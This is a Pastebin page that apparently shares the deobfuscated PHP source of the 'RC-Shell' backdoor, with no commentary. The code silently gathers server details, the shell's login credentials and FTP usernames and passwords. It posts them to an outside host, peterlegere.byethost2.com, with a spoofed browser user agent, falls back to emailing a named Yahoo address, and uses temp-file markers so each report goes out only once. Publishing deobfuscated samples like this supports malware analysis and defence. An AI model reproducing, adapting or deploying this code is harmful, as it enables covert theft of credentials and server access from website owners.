xme

RC-Shell Deobfuscated Backdoor

xme
May 12th, 2017
1,086
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @error_reporting(0);
  2. @ini_set("display_errors", false);
  3. function rc1ire($f){ return @fclose(@fopen($f, 'r')) ? 1 : 0; }
  4. function rc1iwr($f){ return @fclose(@fopen($f, 'a')) ? 1 : 0; }
  5. function rc1wri($f,$c){ $fp=@fopen($f, 'w'); @fputs($fp, $c); @fclose($fp); }
  6. function rc1ffm($t){ return @str_replace("//","/",@str_replace("\\","/",$t)); }
  7. function rc1dd(){ return (@extension_loaded('curl') && @function_exists('curl_init')) ? 1 : 0; }
  8. function rc1tmp(){
  9.  global $tempdir;
  10.  if(@isset($tempdir)&&@is_dir($tempdir)&&@is_writable($tempdir)) return $tempdir;
  11.  foreach(array("/tmp/","/var/tmp/","/usr/tmp/","/dev/shm/","%WINDIR/temp/") as $t){
  12.   if(@file_exists($t)&&@is_dir($t)&&@is_writable($t)) return $t;
  13.  }
  14.  return false;
  15. }
  16. function rc1url(){
  17.  $h = (empty($_SERVER['HTTPS']) || strtolower($_SERVER['HTTPS']) == 'off' ? false : true);
  18.  $u = 'http' . (($h ? 's' : '') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']);
  19.  $m = (empty($_SERVER['PATH_INFO']) ? 'QUERY_STRING' : 'PATH_INFO');
  20.  $s = $m == 'QUERY_STRING' ? '?' : '';
  21.  return $u . $s . (isset($_SERVER[$m]) ? $_SERVER[$m] : '');
  22. }
  23. if(rc1dd()) {
  24.  function rc1p($u,$v,$h){
  25.   if($h != "1" && $h != "0") $h = "0";
  26.   $v = "content_type=new_data_entry&base_content=" . @urlencode(@base64_encode($v)) . "&hidden_type=" . $h . "&sys_type=" . PHP_OS . "&ip=" . $_SERVER['REMOTE_ADDR'];
  27.   $a = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR";
  28.   $u = "http://" . $u;
  29.   $c = @curl_init();
  30.   @curl_setopt($c, CURLOPT_URL, $u);
  31.   @curl_setopt($c, CURLOPT_USERAGENT, $a);
  32.   @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  33.   @curl_setopt($c, CURLOPT_POST, 1);
  34.   @curl_setopt($c, CURLOPT_POSTFIELDS, $v);
  35.   @curl_setopt($c, CURLOPT_TIMEOUT, 4);
  36.   @curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 4);
  37.   $r = @curl_exec($c);
  38.   @curl_close($c);
  39.   return (!@empty($r) && @strstr($r, "saved_rcshell_entry")) ? 1 : 0;
  40.  }
  41. }
  42. function rc1ftp($t=0){
  43.  global $act,$ftp_server,$ftp_port,$ftp_username,$ftp_password;
  44.  $n="\n";
  45.  $c=0;
  46.  $v='';
  47.  if(@isset($act)&&$act=="ftp"&&@isset($ftp_port)&&!@empty($ftp_port)&&@isset($ftp_server)&&@isset($ftp_username)&&@isset($ftp_password)&&!@empty($ftp_server)&&!@empty($ftp_username)&&!@empty($ftp_password)){
  48.   $c=1;
  49.   $v="FTP: $ftp_server:$ftp_port|USER: $ftp_username|PASS: $ftp_password\n";
  50.  }
  51.  if($t!==0){
  52.   if(!$c) return '';
  53.   if(@function_exists("ftp_connect")&&@function_exists("ftp_login")&&@function_exists("ftp_close")){
  54.    $fff = @ftp_connect($ftp_server,$ftp_port,3);
  55.    if($fff) {
  56.     if(@ftp_login($fff, $ftp_username, $ftp_password)){
  57.      @ftp_close($fff);
  58.      return $v;
  59.     }
  60.     @ftp_close($fff);
  61.    }
  62.   }
  63.   return '';
  64.  }
  65.  return $v;
  66. }
  67. function rc1cfg($ar){
  68.  $n="\n";
  69.  global $config;
  70.  $r='';
  71.  foreach(array('version','auth','default_vars') as $c){
  72.   if(@isset($config[$c])){
  73.    if(@is_array($config[$c])){
  74.     foreach($config[$c] as $k=>$v) @$r.=$c." ".$k."=".$v.$n;
  75.    } else {
  76.     @$r.=$c."=".$config[$c].$n;
  77.    }
  78.   }
  79.  }
  80.  return $r;
  81. }
  82. function rc1pst(){
  83.  $n="\n";
  84.  $v='';
  85.  global $config;
  86.  if(@isset($config["auth"]["md5_user"])&&@isset($config["auth"]["md5_pass"])&&@isset($_POST["zu"])&&@isset($_POST["zp"])){
  87.   if($config["auth"]["md5_user"]==@md5($_POST["zu"])&&$config["auth"]["md5_pass"]==$_POST["zp"]){
  88.    $v.="zu=".$_POST["zu"].$n;
  89.    $v.="zp=".$_POST["zp"].$n;
  90.   }
  91.  }
  92.  return $v;
  93. }
  94. function rc1add($ar){
  95.  global $bsafe,$bopendir;
  96.  $n="\n";
  97.  $v="URL=".rc1url().$n.$n;
  98.  $v .= "php=".@phpversion().$n;
  99.  $v .= "safe_mode=".((@isset($bsafe)) ? (($bsafe) ? "ON":"OFF") :"?").$n;
  100.  $v .= "open_dir=".((@isset($bopendir)) ? (($bopendir) ? "YES":"NO") :"?").$n;
  101.  $v .= rc1pst();
  102.  $v .= rc1cfg();
  103.  $v .= rc1ftp();
  104.  foreach(array('SERVER_NAME','SERVER_ADDR','SERVER_PORT','HTTP_REFERER','PHP_SELF','REQUEST_URI','SCRIPT_NAME','SCRIPT_FILENAME','CLIENT_IP','REMOTE_ADDR') as $sv){
  105.   if(@isset($_SERVER[$sv])){ $v.=$sv."=".$_SERVER[$sv].$n; }
  106.  }
  107.  return $v;
  108. }
  109. function rc1sd($h,$v,$s,$u1,$m1){
  110.  if(rc1dd()) {
  111.   if(!rc1p($u1, $v, $h)) @mail($m1, $s, $v);
  112.  } else {
  113.   @mail($m1, $s, $v);
  114.  }
  115. }
  116. $rc1tmp=rc1tmp();
  117. if($rc1tmp!==false){
  118.  @$r = rc1ffm($rc1tmp . "/" . @md5(@uniqid(@rand()) . @md5(@time())));
  119.  if(rc1iwr($r)) {
  120.   $cfile = rc1ffm($rc1tmp . "/www_sess_" . @md5(rc1url().rc1cfg()));
  121.   @unlink($r);
  122.  
  123.   $m1 = "peterlegere51@yahoo.com";
  124.   $u1 = "peterlegere.byethost2.com/news/index.php";
  125.   $s = PHP_OS ."|".rc1url();
  126.   $h = "0";
  127.   if(!rc1ire($cfile)) {
  128.    $v = rc1add();
  129.    rc1sd($h, $v, $s, $u1, $m1);
  130.    rc1wri($cfile, "1");
  131.   }
  132.   $fv=rc1ftp(1);
  133.   if(!@empty($fv)){
  134.    $h = "1";
  135.    $sfile = rc1ffm($rc1tmp . "/www_sess_" .@md5($cfile.$fv));
  136.    if(!rc1ire($sfile)) {
  137.     $v = rc1add();
  138.     rc1sd($h, $v, "FTP|".$s, $u1, $m1);
  139.     rc1wri($sfile, "1");
  140.    }
  141.   }
  142.  }
  143. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×